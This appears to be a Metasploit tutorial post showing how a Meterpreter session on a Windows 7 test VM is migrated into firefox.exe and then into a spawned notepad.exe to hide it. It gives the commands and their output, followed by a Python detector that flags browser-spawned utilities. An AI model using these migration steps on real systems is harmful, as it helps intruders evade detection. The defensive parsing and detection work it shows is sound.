[MAD-METASPLOIT] 0x31 - Migrate & Hiding process

Process Migrate

meterpreter > ps

Process List

PID   PPID  Name             Arch  Session  User                       Path
---   ----  ----             ----  -------  ----                       ----
0     0     [System Process]
4     0     System           x86   0
252   4     smss.exe         x86   0        NT AUTHORITY\SYSTEM        \SystemRoot\System32\smss.exe
264   472   svchost.exe      x86   0        NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
324   2716  firefox.exe      x86   1        HAHWUL\Test-Virtualbox     C:\Program Files\Mozilla Firefox\firefox.exe
328   320   csrss.exe        x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\csrss.exe
376   320   wininit.exe      x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\wininit.exe
384   368   csrss.exe        x86   1        NT AUTHORITY\SYSTEM        C:\Windows\system32\csrss.exe
412   368   winlogon.exe     x86   1        NT AUTHORITY\SYSTEM        C:\Windows\system32\winlogon.exe
472   376   services.exe     x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\services.exe
480   376   lsass.exe        x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\lsass.exe
488   376   lsm.exe          x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\lsm.exe
608   472   svchost.exe      x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\svchost.exe
668   472   VBoxService.exe  x86   0        NT AUTHORITY\SYSTEM        C:\Windows\system32\VBoxService.exe
676   4416  QQPCNetFlow.exe  x86   1        HAHWUL\Test-Virtualbox     C:\Program Files\Tencent …snip..
7884  608   Tencentdl.exe    x86   1        HAHWUL\Test-Virtualbox     C:\program files\common files\tencent\qqdownload\130\tencentdl.exe
8064  472   svchost.exe      x86   0        NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe

meterpreter > migrate 324
[*] Migrating from 5908 to 324...
[*] Migration completed successfully.

Migrate using a post module

meterpreter > run post/windows/manage/migrate
[*] Running module against HAHWUL
[*] Current server process: firefox.exe (324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 7428
[+] Successfully migrated to process 7428

meterpreter > ps
..snip..
7428  324   notepad.exe      x86   1        HAHWUL\Test-Virtualbox     C:\Windows\system32\notepad.exe
..snip..

meterpreter > sysinfo
Computer        : HAHWUL
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: HAHWUL\Test-Virtualbox
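The `ps` listing after `run post/windows/manage/migrate` shows the spawned notepad.exe (7428) with PPID 324, i.e. firefox.exe, the process the session had been living in. On a normal desktop notepad.exe is started by explorer.exe, so a browser that is the parent of a stock Windows utility is one signal a defender can look for when hunting for migrated sessions. The following Python is an added example, not code from the original post or from Metasploit: it parses a meterpreter-style `ps` listing (the sample rows are constructed here, modelled on the ones above) and flags browser-spawned utilities. The browser and utility name sets are assumptions of this example, not a Metasploit or Windows list.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of meterpreter's `ps` listing
# (PID PPID Name Arch Session User Path), modelled on the rows shown above.
SAMPLE_PS = r"""
Process List

 PID   PPID  Name             Arch  Session  User                    Path
 ---   ----  ----             ----  -------  ----                    ----
 324   2716  firefox.exe      x86   1        HAHWUL\Test-Virtualbox  C:\Program Files\Mozilla Firefox\firefox.exe
 472   376   services.exe     x86   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\services.exe
 608   472   svchost.exe      x86   0        NT AUTHORITY\SYSTEM     C:\Windows\system32\svchost.exe
 7428  324   notepad.exe      x86   1        HAHWUL\Test-Virtualbox  C:\Windows\system32\notepad.exe
"""


@dataclass(frozen=True)
class Process:
    pid: int
    ppid: int
    name: str
    arch: str
    session: int
    user: str
    path: str


# One row: numeric PID/PPID/session, single-token name and arch, then a user
# that may contain spaces ("NT AUTHORITY\SYSTEM") and a path that starts with
# a drive letter or a backslash and may also contain spaces.
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(.*?)\s+((?:[A-Za-z]:\\|\\)\S.*?)\s*$"
)


def parse_ps(text: str) -> list[Process]:
    """Return the rows of a meterpreter-style ps listing.

    Header, separator and rows without a user/path column are skipped.
    """
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        pid, ppid, name, arch, session, user, path = m.groups()
        procs.append(Process(int(pid), int(ppid), name, arch, int(session), user, path))
    return procs


# Heuristic constructed for this example (an assumption, not a vendor list):
# an interactive browser is not an expected parent for a stock Windows utility
# such as notepad.exe, which explorer.exe normally launches. Because the
# migrate post module spawns its new host from the current process, the
# browser ends up as the parent of that utility.
BROWSERS = {"firefox.exe", "chrome.exe", "iexplore.exe"}
UTILITY_CHILDREN = {"notepad.exe", "calc.exe", "rundll32.exe", "svchost.exe"}


def find_suspicious_children(procs: list[Process]) -> list[tuple[str, int, str, int]]:
    """Return (parent name, parent pid, child name, child pid) for each browser -> utility pair."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        if parent.name.lower() in BROWSERS and p.name.lower() in UTILITY_CHILDREN:
            hits.append((parent.name, parent.pid, p.name, p.pid))
    return hits


if __name__ == "__main__":
    for parent_name, ppid, name, pid in find_suspicious_children(parse_ps(SAMPLE_PS)):
        print(f"suspicious: {name} ({pid}) spawned by {parent_name} ({ppid})")
```

The same parent/child check can be applied to Sysmon process-creation events or a live process tree; the parser here only exists so the rule can be exercised against the text shown in this post.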